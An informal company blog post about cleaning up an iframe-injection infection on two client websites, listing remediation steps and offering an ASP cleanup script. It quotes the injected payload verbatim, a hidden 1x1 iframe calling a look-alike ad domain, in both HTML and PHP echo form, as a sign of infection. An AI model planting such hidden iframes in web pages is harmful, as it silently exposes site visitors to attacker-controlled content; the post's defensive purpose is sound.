Iframe Injection (Story with lot of pain)
Hi everyone,
First of all, I would like to welcome you all to our new blog, we’ll try to post here some useful posts concerns to technology, software development, Social networking, internet and more..
Anyway, 5 months ago a small problem occurred on our office, suddenly an evil iframe injection decided to take down two of our clients websites.
Rotem and Modi, two of the world most talented web developers (-: got in to the picture and resolved the problem with the guidance of Ronnen (one of CodeOasis partners) and with a tiny assistance of me.
This is the implant that let you know you’ve got the Iframe injection:
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe> – – — – – – on HTML Files
OR
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”; – – – – – – – – – – On PHP files
I decided to write this post to help every poor human or developer to solve this annoying problem using a asp script that we couldn’t find anywhere on the net (there’s only PHP scripts).
This is the steps we went through vs. the evil Iframe injection:
1. The first thing is to change the passwords of your FTP, Database, and Control panel.
2. File permissions in your server to the secure mode. (Ex: Any anonymous, Internet User access to be restricted). You need to contact your hosting company for this task.
3. Please download your files (web) from the server and check for infections. Clean the infected files. (Please contact your programmer/developer’s for this task)
4. Scan and clean your PCs/Workstation that you use for logging into your Web hosting server.
5. Please avoid using public/shared computers to access your server.
How do I clean the infected files?
Search for all pages containig the malicious code and replace it with space.
Rotem, one of Code Oasis developers, developed an asp script that creates a list of all damaged files allows you to go over manually and clean the hostile iframes (it couldn’t be done automatically because the iframe injection blocked access to some of the files). You can download Rotem script HERE!!!
That’s all for today, I hope anyone will find this post helpful.
